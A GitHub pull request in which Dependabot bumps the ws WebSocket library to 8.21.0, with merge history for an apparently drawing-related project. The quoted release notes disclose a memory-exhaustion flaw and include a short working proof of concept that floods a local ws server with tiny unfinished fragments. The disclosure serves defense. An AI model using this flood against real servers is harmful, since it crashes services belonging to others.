Skip to content

build(deps-dev): bump ws from 8.20.0 to 8.21.0#298

Merged
Flow-Fly merged 1 commit into
mainfrom
dependabot/npm_and_yarn/ws-8.21.0
Jul 10, 2026
Merged

build(deps-dev): bump ws from 8.20.0 to 8.21.0#298
Flow-Fly merged 1 commit into
mainfrom
dependabot/npm_and_yarn/ws-8.21.0

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jul 10, 2026

Copy link
Copy Markdown
Contributor

Bumps ws from 8.20.0 to 8.21.0.

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

8.20.1

... (truncated)

Commits
  • bca91ad [dist] 8.21.0
  • 2b2abd4 [security] Limit retained message parts
  • 78eabe2 [security] Add latest vulnerability to SECURITY.md
  • 5d9b316 [dist] 8.20.1
  • c0327ec [security] Fix uninitialized memory disclosure in websocket.close()
  • ce2a3d6 [ci] Test on node 26
  • 58e45b8 [ci] Do not test on node 25
  • 5f26c24 [ci] Run the lint step on node 24
  • See full diff in compare view

@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code labels Jul 10, 2026
@Flow-Fly Flow-Fly changed the base branch from main to develop July 10, 2026 07:23
@Flow-Fly Flow-Fly closed this Jul 10, 2026
@Flow-Fly Flow-Fly reopened this Jul 10, 2026
@dependabot @github

dependabot Bot commented on behalf of github Jul 10, 2026

Copy link
Copy Markdown
Contributor Author

OK, I won't notify you again about this release, but will get in touch when a new version is available. If you'd rather skip all updates until the next major or minor version, let me know by commenting @dependabot ignore this major version or @dependabot ignore this minor version.

If you change your mind, just re-open this PR and I'll resolve any conflicts on it.

Bumps [ws](https://github.com/websockets/ws) from 8.20.0 to 8.21.0.
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.0...8.21.0)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot changed the base branch from develop to main July 10, 2026 07:26
@dependabot dependabot Bot force-pushed the dependabot/npm_and_yarn/ws-8.21.0 branch from e5c3a80 to 9ed1ef8 Compare July 10, 2026 07:26
@Flow-Fly Flow-Fly merged commit 0b73c17 into main Jul 10, 2026
1 check passed
@dependabot dependabot Bot deleted the dependabot/npm_and_yarn/ws-8.21.0 branch July 10, 2026 07:34
Flow-Fly added a commit that referenced this pull request Jul 10, 2026
* Run integration CI on develop

* build(deps-dev): bump ws from 8.20.0 to 8.21.0 (#298)

Bumps [ws](https://github.com/websockets/ws) from 8.20.0 to 8.21.0.
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.0...8.21.0)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Flow-Fly added a commit that referenced this pull request Jul 10, 2026
* Run integration CI on develop (#302)

* Run integration CI on develop

* build(deps-dev): bump ws from 8.20.0 to 8.21.0 (#298)

Bumps [ws](https://github.com/websockets/ws) from 8.20.0 to 8.21.0.
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.0...8.21.0)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* Add deterministic guide image sampling (#304)

* Generate bounded numbered guides (#305)

* Add restrictive guide palette options (#306)

* Persist guided drawing sessions (#307)

* Create guided projects in separate contexts (#308)

* Add guided project setup flow (#309)

* Derive guided drawing progress (#311)

* Render readable guided cell numbers (#312)

* Add guided palette and creative progress (#313)

* Keep guided project structure aligned (#314)

* Add temporary guidance view controls (#316)

* Finish guidance without changing artwork (#317)

* Add guided library entry and exact resume (#318)

* Keep editor open on first run (#320)

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant